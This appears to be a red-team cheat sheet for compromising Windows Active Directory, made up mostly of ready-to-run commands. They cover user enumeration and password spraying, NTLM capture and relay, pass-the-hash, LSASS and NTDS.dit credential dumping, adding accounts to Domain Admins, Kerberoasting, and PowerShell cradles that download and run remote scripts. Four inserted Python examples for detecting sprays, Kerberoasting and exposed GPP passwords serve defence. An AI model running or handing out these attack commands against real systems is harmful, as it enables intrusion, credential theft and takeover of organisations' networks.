https://github.com/dcsync/recontools
python3 office365userenum.py -u test.txt -v -o output.txt --password 'Password1'
Enumeration (opsec safe):
python o365creeper.py -f test.txt
https://github.com/0xZDH/o365spray
https://crt.sh
%.blah.com
python3 ./domainhunter.py -r 1000
PS C:\> Invoke-PowerMeta -TargetDomain targetdomain.com
Invoke-UsernameHarvestOWA -ExchHostname mail.domain.com -UserList .\userlist.txt -Threads 1 -OutFile owa-valid-users.txt
Invoke-DomainHarvestOWA -ExchHostname mail.domain.com
Invoke-PasswordSprayOWA -ExchHostname mail.domain.com -UserList .\userlist.txt -Password Fall2016 -Threads 15 -OutFile owa-sprayed-creds.txt
theharvester -d blah.com -l 1000 -b linkedin
https://github.com/m8r0wn/CrossLinked
Regex to extract email addresses from a file:
grep -E -o "\b[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,6}\b"
cat linkedin.txt | tr , '\n' | sed 's/"//g' | awk '/"title":{"textDirection":"FIRST_STRONG"/{getline; print}'
awk '$0=$0 FS tolower(substr($1,1,1)$NF)' linkedin-user-list.txt | awk '{ print $NF }'
awk '{print $0,tolower(substr($1,1,1)$NF)}' names.txt
Handy if you have generated a list of names from LinkedIn or already have a list of usernames (appends a first-initial + surname username to each line).
nmap -p 88 1.1.1.1 --script krb5-enum-users --script-args krb5-enum-users.realm="DOMAIN"
The default username list is located at /usr/local/share/nmap/nselib/data/usernames.lst in Kali.
Null sessions still work on infrastructure that was upgraded from Windows 2000 or 2003.
net use \\IP_ADDRESS\ipc$ "" /user:""
Use enum4linux, enum or Dumpsec following the null session setup.
https://bitbucket.org/grimhacker/gpppfinder/src/master/
findstr /S /I cpassword \\<FQDN>\sysvol\<FQDN>\policies\*.xml
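The findstr above is the quick way to spot Group Policy Preference files that still embed a cpassword; a defender auditing SYSVOL wants the same check done properly by parsing the XML rather than grepping for a substring. The following is an added example written for this page, not code from any of the projects linked here. It builds a constructed SYSVOL-like directory in a temp folder (the GPO GUID and the cpassword value are placeholders) and reports every XML element that carries a non-empty cpassword attribute, skipping files that are not well-formed XML.

```python
"""Scan a SYSVOL-style directory tree for Group Policy Preference XML files that
still carry a cpassword attribute.  Added example; the sample file below is
constructed, not taken from any real domain."""
import os
import tempfile
import xml.etree.ElementTree as ET

# Constructed sample with the shape of a Groups.xml that embeds a cpassword.
# The cpassword value here is a placeholder, not a real encrypted password.
SAMPLE_GROUPS_XML = """<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}">
  <User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="localadmin"
        image="2" changed="2016-03-01 10:00:00" uid="{00000000-0000-0000-0000-000000000001}">
    <Properties action="U" newName="" fullName="" description=""
                cpassword="PLACEHOLDER_CPASSWORD_VALUE" changeLogon="0"
                noChange="1" neverExpires="1" acctDisabled="0" userName="localadmin"/>
  </User>
</Groups>
"""

def find_cpasswords(root_dir):
    """Walk root_dir, parse every .xml file, and return a list of
    (file path, element tag, userName) tuples for elements with a cpassword attribute.
    Files that are not well-formed XML are skipped rather than aborting the scan."""
    findings = []
    for dirpath, _dirnames, filenames in os.walk(root_dir):
        for name in filenames:
            if not name.lower().endswith(".xml"):
                continue
            path = os.path.join(dirpath, name)
            try:
                tree = ET.parse(path)
            except ET.ParseError:
                continue
            for elem in tree.iter():
                if elem.attrib.get("cpassword"):
                    findings.append((path, elem.tag, elem.attrib.get("userName", "")))
    return findings

def build_sample_sysvol():
    """Create a temporary tree laid out like <sysvol>/<domain>/Policies/<GUID>/...
    holding one Groups.xml with a cpassword and one harmless XML file."""
    base = tempfile.mkdtemp(prefix="sysvol_")
    gpo = os.path.join(base, "domain.local", "Policies", "{PLACEHOLDER-GPO-GUID}",
                       "Machine", "Preferences", "Groups")
    os.makedirs(gpo)
    with open(os.path.join(gpo, "Groups.xml"), "w", encoding="utf-8") as f:
        f.write(SAMPLE_GROUPS_XML)
    with open(os.path.join(base, "domain.local", "Policies", "clean.xml"), "w", encoding="utf-8") as f:
        f.write('<?xml version="1.0"?><Groups><User name="x"><Properties action="U" userName="x"/></User></Groups>')
    return base

if __name__ == "__main__":
    # Point find_cpasswords at \\<FQDN>\sysvol\<FQDN>\policies (mounted locally) on a real audit.
    sysvol = build_sample_sysvol()
    for path, tag, user in find_cpasswords(sysvol):
        print(f"cpassword found: {path} ({tag} for user {user!r})")
```

On a real audit, point find_cpasswords at a locally mounted copy of the policies share; any hit means the preference item should be removed and the account's password rotated, since the cpassword encryption key is public.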
https://github.com/dafthack/HostRecon
Privesc checks: https://book.hacktricks.xyz/windows/checklist-windows-privilege-escalation
Grab NetNTLM hashes off the network
responder -I eth0
responder -I eth0 --wpad -b -f -F
sort -m *.txt | uniq -d | awk '!/\$/'
john SMB-NTLMv2-Client-172.20.22.217.txt --wordlist=/root/passwords.txt
Use hashcat on a more powerful box. This is only for easy wins.
ntlmrelayx.py -tf targets.txt -c <insert Empire Powershell launcher>
python mitm6.py -d blah.local
impacket-smbserver hiya /tmp/ -smb2support
$Company1 $Season$Year Password1 Password! Welcome1 Welcome! Welcome@123 P@55word P@55w0rd $month$year
hydra -L users.txt -p Password1 -m 'D' 172.20.11.55 smbnt -V
@FOR /F %n in (users.txt) DO @FOR /F %p in (pass.txt) DO @net use \\DOMAINCONTROLLER\IPC$ /user:DOMAIN\%n %p 1>NUL 2>&1 && @echo [*] %n:%p && @net use /delete \\DOMAINCONTROLLER\IPC$ > NUL
net view /domain > systems.txt
@FOR /F %s in (systems.txt) DO @net use \\%s\C$ /user:domain\username Password 1>NUL 2>&1 && @echo %s>>admin_access.txt && @net use /delete \\%s\C$ > NUL
Invoke-DomainPasswordSpray -Password Spring2017
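Every spray above (hydra, the net use loop, Invoke-DomainPasswordSpray) leaves the same footprint on the domain controller: one source address producing logon failures against many different accounts in a short window, each account touched only once or twice so lockout is never reached. The following is an added example, not part of the original notes, showing detection logic for that pattern over constructed 4625-style records (simplified to key=value pairs; a real pipeline would read the Security log or a SIEM export). A single account failing repeatedly from one address is deliberately not flagged, since that is a brute force or a user mistyping, not a spray.

```python
"""Detect password-spray patterns in Windows logon-failure records: one source
address failing against many distinct accounts inside a short window.
Added example; the log lines below are constructed."""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample of 4625 (logon failure) events, reduced to key=value pairs.
SAMPLE_EVENTS = """\
2017-03-01T09:00:01 EventID=4625 TargetUserName=alice IpAddress=10.0.0.50 Status=0xC000006D
2017-03-01T09:00:02 EventID=4625 TargetUserName=bob IpAddress=10.0.0.50 Status=0xC000006D
2017-03-01T09:00:03 EventID=4625 TargetUserName=carol IpAddress=10.0.0.50 Status=0xC000006D
2017-03-01T09:00:04 EventID=4625 TargetUserName=dave IpAddress=10.0.0.50 Status=0xC000006D
2017-03-01T09:00:05 EventID=4625 TargetUserName=erin IpAddress=10.0.0.50 Status=0xC000006D
2017-03-01T09:00:06 EventID=4625 TargetUserName=frank IpAddress=10.0.0.50 Status=0xC000006D
2017-03-01T09:05:00 EventID=4625 TargetUserName=alice IpAddress=10.0.0.77 Status=0xC000006D
2017-03-01T09:05:30 EventID=4625 TargetUserName=alice IpAddress=10.0.0.77 Status=0xC000006D
2017-03-01T09:06:00 EventID=4625 TargetUserName=alice IpAddress=10.0.0.77 Status=0xC000006D
2017-03-01T10:00:00 EventID=4624 TargetUserName=bob IpAddress=10.0.0.50 Status=0x0
"""

def parse_events(text):
    """Turn each 'timestamp key=value ...' line into a dict with a parsed 'ts'."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, *pairs = line.split()
        fields = dict(p.split("=", 1) for p in pairs)
        fields["ts"] = datetime.fromisoformat(ts)
        events.append(fields)
    return events

def detect_spray(events, window=timedelta(minutes=10), min_accounts=5):
    """Return {source_ip: sorted distinct accounts} for sources whose failed
    logons hit at least min_accounts distinct accounts within any `window`.
    Only 4625 events count; repeated failures against a single account
    (brute force, or a user mistyping) do not trigger this rule."""
    by_src = defaultdict(list)
    for e in events:
        if e.get("EventID") == "4625":
            by_src[e["IpAddress"]].append((e["ts"], e["TargetUserName"]))
    hits = {}
    for src, attempts in by_src.items():
        attempts.sort()
        for i, (start, _) in enumerate(attempts):
            users = {u for t, u in attempts[i:] if t - start <= window}
            if len(users) >= min_accounts:
                hits[src] = sorted(users)
                break
    return hits

if __name__ == "__main__":
    for src, users in detect_spray(parse_events(SAMPLE_EVENTS)).items():
        print(f"possible spray from {src}: {len(users)} accounts -> {', '.join(users)}")
```

Tune `window` and `min_accounts` to the environment; a spray that paces itself below the lockout observation window will need a longer window and a lower threshold, and the same rule applies to OWA and Office 365 sign-in logs with the field names changed.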
Once you have an initial set of compromised creds, run these from a virtual machine to gain a foothold on the network as a domain user.
C:\runas.exe /netonly /user:BLAHDOMAIN\blahuser cmd.exe
runas /netonly /user:<user@domain.fqdn> "mmc %SystemRoot%\system32\dsa.msc"
Make sure you use the FQDN of the domain and set the registry key as below.
nltest /dsgetdc:domain.local
To point at the DC of the domain being tested, set this registry value:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Netlogon\Parameters "SiteName" = DC1.domain.com
net use \\10.0.0.1\ipc$ /user:domain.local\username password
net users /domain
net group /domain "Domain Admins"
net accounts /domain
Note that the above net commands do not work with runas /netonly. The PowerView functions below do work with runas.
. .\PowerView.ps1
Get-UserProperty -Properties samaccountname
Get-NetGroupMember
Get-DomainPolicy
Search shares and files using Invoke-FileFinder and Invoke-ShareFinder
Run locally on a non-domain-joined machine (remember to add the target domain to the registry):
. .\BloodHound.ps1
Invoke-BloodHound
SharpHound.exe --CollectionMethod All
Useful when you have a remote shell.
powershell Set-ExecutionPolicy RemoteSigned
powershell -command "& { . C:\BloodHound.ps1; Invoke-BloodHound }"
Use this when you cannot copy BloodHound.ps1 over to target.
powershell "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/master/PowerShell/BloodHound.ps1'); Invoke-BloodHound"
SharpPick.exe -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/master/Ingestors/SharpHound.ps1'); Invoke-BloodHound"
SharpPick-64.exe -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Privesc/PowerUp.ps1'); Invoke-AllChecks"
.\godditest-windows-amd64.exe -username=testuser -password="testpass!" -domain="test.local" -dc="dc.test.local" -unsafe
https://github.com/sense-of-security/ADRecon
Invoke-ShareFinder -CheckShareAccess -Verbose -Threads 20 | Out-File -Encoding Ascii interesting-shares.txt
Invoke-FileFinder -ShareList .\interesting-shares.txt -Verbose -Threads 20 -OutFile juicy_files.csv
docker run --rm -it -v /tmp/blah:/tmp/EyeWitness eyewitness --web --single https://www.google.com
https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/
crackmapexec smb 172.16.110.0/24
crackmapexec smb 172.16.110.154 -u Administrator -p Password1 -x 'ipconfig'
crackmapexec smb 172.16.110.154 -u Administrator -p Password1 --pass-pol
crackmapexec smb 172.16.110.154 -u Administrator -p Password1 -M mimikatz
crackmapexec smb 172.16.110.154 -u Administrator -p Password1 --sam
crackmapexec smb 172.16.110.154 -u Administrator -p Password1 --lsa
pth-winexe //10.0.0.1 -U DOMAINBLAH/blahuser%blahpassword cmd
pth-winexe //10.0.0.1 -U DOMAINBLAH/blahuser%hash cmd
Impacket psexec.py to boxes (not opsec safe): it cleans up after itself but leaves event log entries from installing and running the service.
psexec.py user@IP
psexec.py user@IP -hashes ntlm:hash
wmiexec.py domain/user@IP
wmiexec.py domain/user@IP -hashes ntlm:hash
python smbclient.py domain/user@IP -hashes aad3b435b51404eeaad3b435b51404ee:blah
Using mimikatz:
privilege::debug
sekurlsa::pth /user:<user name> /domain:<domain name> /ntlm:<the user's ntlm hash> /run:"mstsc.exe /restrictedadmin"
If RestrictedAdmin is disabled on the target:
sekurlsa::pth /user:<user name> /domain:<domain name> /ntlm:<the user's ntlm hash> /run:powershell.exe
Enter-PSSession -Computer <Target>
New-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\Lsa" -Name "DisableRestrictedAdmin" -Value "0" -PropertyType DWORD -Force
Invoke-WMIExec -Target blah -Username blah -Hash NTLMHASH -Command blah
samdump2 SYSTEM SAM > hashes.txt
C:\> reg.exe save hklm\sam c:\temp\sam.save
C:\> reg.exe save hklm\security c:\temp\security.save
C:\> reg.exe save hklm\system c:\temp\system.save
secretsdump.py -sam sam.save -security security.save -system system.save LOCAL
pwdump system sam
C:\> procdump.exe -accepteula -ma lsass.exe c:\lsass.dmp 2>&1
C:\> mimikatz.exe log "sekurlsa::minidump lsass.dmp" sekurlsa::logonPasswords exit
C:\>mini.exe
https://github.com/b4rtik/ATPMiniDump
mimikatz # privilege::debug
mimikatz # sekurlsa::logonPasswords full
impacket-secretsdump Administrator@ip
impacket-secretsdump Administrator@ip -hashes ntlm:hash
To find where NTDS.dit is stored, run:
reg.exe query hklm\system\currentcontrolset\services\ntds\parameters
C:\> vssadmin list shadows
C:\> vssadmin create shadow /for=C:
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy[X]\windows\ntds\ntds.dit .
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy[X]\windows\system32\config\SYSTEM .
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy[X]\windows\system32\config\SAM .
secretsdump.py -system system.save -ntds ntds.dit local -just-dc-ntlm
Remove machine accounts:
grep -a -F ':::' hashes.txt | grep -av '$:' > finalhashes.txt
Only the passwords, for feeding into pipal:
cut -f 3 -d ':' cracked_with_users_enabled.txt
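The grep and cut above are the minimal post-processing of a secretsdump file; when the same dump is used for a password audit, the questions worth answering are which accounts still store an LM hash and which accounts share a password. The following is an added example written for this page, not code from Impacket or any tool linked here. It parses the user:rid:lmhash:nthash::: layout that secretsdump emits (the sample lines are constructed and the hashes are fake), drops machine accounts exactly as the grep does, and reports LM hashes that differ from the empty-password constant together with NT hashes shared by more than one account. Nothing here cracks anything: shared hashes are a finding on their own.

```python
"""Triage a secretsdump-style hash file from a defender's point of view:
drop machine accounts, flag accounts that still have a non-empty LM hash, and
group accounts that share an NT hash (password reuse).  Added example; the
sample lines are constructed with placeholder hashes."""
from collections import defaultdict

EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"  # LM hash of the empty string

# Constructed sample in the user:rid:lmhash:nthash::: layout; the hashes are fake.
SAMPLE_DUMP = """\
domain.local\\Administrator:500:aad3b435b51404eeaad3b435b51404ee:11111111111111111111111111111111:::
domain.local\\alice:1106:aad3b435b51404eeaad3b435b51404ee:22222222222222222222222222222222:::
domain.local\\bob:1107:aad3b435b51404eeaad3b435b51404ee:22222222222222222222222222222222:::
domain.local\\carol:1108:0123456789abcdef0123456789abcdef:33333333333333333333333333333333:::
domain.local\\WS01$:1200:aad3b435b51404eeaad3b435b51404ee:44444444444444444444444444444444:::
domain.local\\svc_backup:1109:aad3b435b51404eeaad3b435b51404ee:22222222222222222222222222222222:::
"""

def parse_dump(text):
    """Yield (account, rid, lm, nt) for each well-formed hash line; banner or
    status lines that do not fit the layout are skipped."""
    for line in text.splitlines():
        parts = line.strip().split(":")
        if len(parts) < 4 or not parts[1].isdigit():
            continue
        yield parts[0], int(parts[1]), parts[2].lower(), parts[3].lower()

def user_accounts(records):
    """Drop machine accounts (sAMAccountName ending in '$'), as the grep above does."""
    return [r for r in records if not r[0].endswith("$")]

def lm_hash_present(records):
    """Accounts whose LM hash is not the empty-password constant, i.e. LM
    storage is still enabled for them and their password is <= 14 characters."""
    return [r[0] for r in records if r[2] != EMPTY_LM]

def shared_nt_hashes(records):
    """Map NT hash -> accounts sharing it, restricted to hashes used by more
    than one account (the same password on several accounts)."""
    groups = defaultdict(list)
    for acct, _rid, _lm, nt in records:
        groups[nt].append(acct)
    return {nt: accts for nt, accts in groups.items() if len(accts) > 1}

if __name__ == "__main__":
    # Replace SAMPLE_DUMP with open("hashes.txt").read() on a real dump.
    users = user_accounts(list(parse_dump(SAMPLE_DUMP)))
    print("user accounts:", len(users))
    print("LM hash still stored:", lm_hash_present(users))
    for nt, accts in shared_nt_hashes(users).items():
        print(f"NT hash {nt[:8]}... shared by: {', '.join(accts)}")
```

Shared hashes that include a privileged account (Administrator, a service account in Domain Admins) are the ones to escalate first; a non-empty LM hash means the NoLMHash policy is not applied to that account.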
vssadmin delete shadows /shadow={cd534584-a272-44ab-81e1-ab3f5fbe9b29}
godumpsecrets is faster for large dumps.
C:\>ntdsutil
ntdsutil: activate instance ntds
ntdsutil: ifm
ifm: create full c:\pentest
ifm: quit
ntdsutil: quit
ntdsutil
ntdsutil: activate instance ntds
ntdsutil: snapshot
snapshot: list all
snapshot: create
snapshot: mount 1
Cleanup snapshots:
snapshot: list all
snapshot: unmount 1
snapshot: list all
snapshot: delete 1
Add a user to Domain Admins, and add a user to the local Administrators group:
net user username password /ADD /DOMAIN
net group "Domain Admins" username /ADD /DOMAIN
net user username password /ADD
net localgroup Administrators username /ADD
If PowerShell is not enabled or you are unable to run BloodHound, this script will find where the account has admin access.
#!/bin/sh
# Runs two harmless commands over each host in ip.txt with the supplied hash; a response means admin access on that host.
for ip in $(cat ip.txt); do
    pth-winexe -U Admin%hash //$ip "ipconfig"
    pth-winexe -U Admin%hash //$ip "tasklist /v"
done
Invoke-Kerberoast -erroraction silentlycontinue -OutputFormat Hashcat
https://raw.githubusercontent.com/xan7r/kerberoast/master/autokerberoast.ps1
Invoke-AutoKerberoast
python autoKirbi2hashcat.py ticketfilefromautoinvokekerberoast
IEX (New-Object Net.WebClient).DownloadString('https://github.com/EmpireProject/Empire/raw/master/data/module_source/credentials/Invoke-Kerberoast.ps1'); Invoke-Kerberoast
sudo apt-get install nvidia-367
sudo nvidia-smi
reboot
sudo hashcat -I
hashcat -m 13100 kerb.txt ~/Downloads/realuniq.lst
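Kerberoasting as run above (Invoke-Kerberoast, then hashcat -m 13100) asks the KDC for RC4 (etype 0x17) service tickets for every SPN-bearing user account, so on the DC it shows up as one account requesting RC4 tickets for many distinct service accounts in quick succession, each logged as event 4769. The following is an added example, not part of the original notes, with detection logic over constructed 4769-style records: it counts, per requesting account, the distinct user service accounts requested with RC4, ignoring computer-account and krbtgt services, and separately reports each account's encryption-type profile, since RC4 requests from a client that otherwise uses AES are the downgrade signal worth a second look.

```python
"""Flag Kerberoast-like behaviour in 4769 (TGS request) records: a single
account requesting RC4 (etype 0x17) service tickets for many distinct user
service accounts.  Added example; the events below are constructed."""
from collections import Counter, defaultdict

RC4_HMAC = "0x17"  # TicketEncryptionType for RC4-HMAC; 0x12 is AES256

# Constructed sample of 4769 events reduced to key=value pairs.
SAMPLE_4769 = """\
2017-03-01T11:00:00 TargetUserName=alice@DOMAIN.LOCAL ServiceName=svc_sql TicketEncryptionType=0x17 IpAddress=10.0.0.50
2017-03-01T11:00:01 TargetUserName=alice@DOMAIN.LOCAL ServiceName=svc_web TicketEncryptionType=0x17 IpAddress=10.0.0.50
2017-03-01T11:00:01 TargetUserName=alice@DOMAIN.LOCAL ServiceName=svc_backup TicketEncryptionType=0x17 IpAddress=10.0.0.50
2017-03-01T11:00:02 TargetUserName=alice@DOMAIN.LOCAL ServiceName=svc_sharepoint TicketEncryptionType=0x17 IpAddress=10.0.0.50
2017-03-01T11:00:02 TargetUserName=alice@DOMAIN.LOCAL ServiceName=svc_exchange TicketEncryptionType=0x17 IpAddress=10.0.0.50
2017-03-01T11:00:03 TargetUserName=alice@DOMAIN.LOCAL ServiceName=WS01$ TicketEncryptionType=0x17 IpAddress=10.0.0.50
2017-03-01T11:30:00 TargetUserName=bob@DOMAIN.LOCAL ServiceName=svc_sql TicketEncryptionType=0x12 IpAddress=10.0.0.60
2017-03-01T11:30:00 TargetUserName=bob@DOMAIN.LOCAL ServiceName=svc_web TicketEncryptionType=0x12 IpAddress=10.0.0.60
2017-03-01T11:30:00 TargetUserName=bob@DOMAIN.LOCAL ServiceName=svc_backup TicketEncryptionType=0x12 IpAddress=10.0.0.60
2017-03-01T11:30:00 TargetUserName=bob@DOMAIN.LOCAL ServiceName=svc_sharepoint TicketEncryptionType=0x12 IpAddress=10.0.0.60
2017-03-01T11:30:00 TargetUserName=bob@DOMAIN.LOCAL ServiceName=svc_exchange TicketEncryptionType=0x12 IpAddress=10.0.0.60
"""

def parse_4769(text):
    """Turn each 'timestamp key=value ...' line into a dict of its fields."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        _ts, *pairs = line.split()
        events.append(dict(p.split("=", 1) for p in pairs))
    return events

def roastable_service(name):
    """Computer accounts (name$) have random 120-character passwords and the
    krbtgt ticket is a TGT, so neither is a meaningful roasting target."""
    return not name.endswith("$") and name.lower() != "krbtgt"

def encryption_profile(events):
    """Map requesting account -> {etype: request count}; a client that mixes
    0x12 normally and suddenly emits a burst of 0x17 stands out here."""
    prof = defaultdict(Counter)
    for e in events:
        prof[e["TargetUserName"]][e["TicketEncryptionType"].lower()] += 1
    return {user: dict(c) for user, c in prof.items()}

def detect_kerberoast(events, min_services=4):
    """Return {requesting account: sorted services} for accounts that requested
    RC4 tickets for at least min_services distinct user service accounts."""
    rc4_services = defaultdict(set)
    for e in events:
        if e["TicketEncryptionType"].lower() != RC4_HMAC:
            continue
        if roastable_service(e["ServiceName"]):
            rc4_services[e["TargetUserName"]].add(e["ServiceName"])
    return {user: sorted(s) for user, s in rc4_services.items() if len(s) >= min_services}

if __name__ == "__main__":
    events = parse_4769(SAMPLE_4769)
    for user, prof in encryption_profile(events).items():
        print(f"{user}: {prof}")
    for user, services in detect_kerberoast(events).items():
        print(f"possible kerberoast by {user}: RC4 tickets for {', '.join(services)}")
```

Accounts whose service tickets are legitimately RC4 (no AES keys set on the service account) will appear in the profile every day, so the threshold should be set against a baseline; the durable fix is AES-only service accounts with long random passwords or group managed service accounts, which leaves nothing worth cracking.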
https://github.com/kfosaaen/Get-LAPSPasswords/blob/master/Get-LAPSPasswords.ps1
IEX (New-Object Net.WebClient).DownloadString('https://github.com/PowerShellEmpire/PowerTools/raw/master/PowerUp/PowerUp.ps1'); Invoke-AllChecks
python smbserver.py test /root/tools
python -m SimpleHTTPServer <port>
https://blog.cobaltstrike.com/2017/02/06/high-reputation-redirectors-and-domain-fronting/
https://signal.org/blog/doodles-stickers-censorship/
https://www.securityartwork.es/2017/01/24/camouflage-at-encryption-layer-domain-fronting/
https://trac.torproject.org/projects/tor/wiki/doc/meek
http://bryceboe.com/2012/03/12/bypassing-gogos-inflight-internet-authentication/
SharpPick.exe -d "http://blah/blah.ps1"
wmic.exe os get /format:"http://blah/foo.xsl"
https://www.mdsec.co.uk/2018/03/payload-generation-using-sharpshooter/
python SharpShooter.py --stageless --dotnetver 2 --payload js --output foo --rawscfile ./output/payload.bin --smuggle --template mcafee --com xslremote --awlurl http://blah/foo.xsl
Boxes on which each user has local admin (BloodHound Cypher):
MATCH (u:User)-[r:MemberOf|:AdminTo*1..]->(c:Computer) return u.name, collect(c.name)
List of Domain Admins:
MATCH p=(u:User)-[:MemberOf]->(g:Group) WHERE g.name = "DOMAIN ADMINS@<DOMAIN.FQDN>" RETURN u.displayname